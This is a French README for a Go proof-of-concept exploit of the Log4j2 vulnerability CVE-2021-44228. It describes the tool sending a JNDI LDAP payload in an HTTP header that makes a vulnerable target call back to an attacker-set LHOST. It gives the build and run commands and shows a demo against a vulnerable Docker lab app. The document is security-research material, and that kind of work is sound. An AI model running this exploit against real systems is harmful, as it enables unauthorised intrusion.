
Un simple PoC Log4j écrit en Go
⚠️ Avertissement :
Cet outil est destiné uniquement à des fins éducatives, à la recherche en sécurité et à des environnements de test contrôlés.
L'utiliser contre des systèmes sans autorisation explicite est illégal et relève entièrement de la responsabilité de l'utilisateur.
Ce projet contient un simple Proof-of-Concept (PoC) d'exploitation de la vulnérabilité Apache Log4j2 (CVE-2021-44228).
Le PoC envoie un en-tête HTTP spécialement conçu avec une charge utile JNDI LDAP à la cible.
Si la cible est vulnérable, elle enverra un callback à l'adresse LHOST spécifiée.
go build -o exploit exploit.go
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
-r → URL cible (point de terminaison de l'application vulnérable)-l → Adresse IP de votre listener de callback (la machine exécutant le PoC)En utilisant l'application Docker vulnérable fournie :
# Lancer l'application vulnérable
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app
# Lancer l'exploit
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1
Sortie attendue :
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE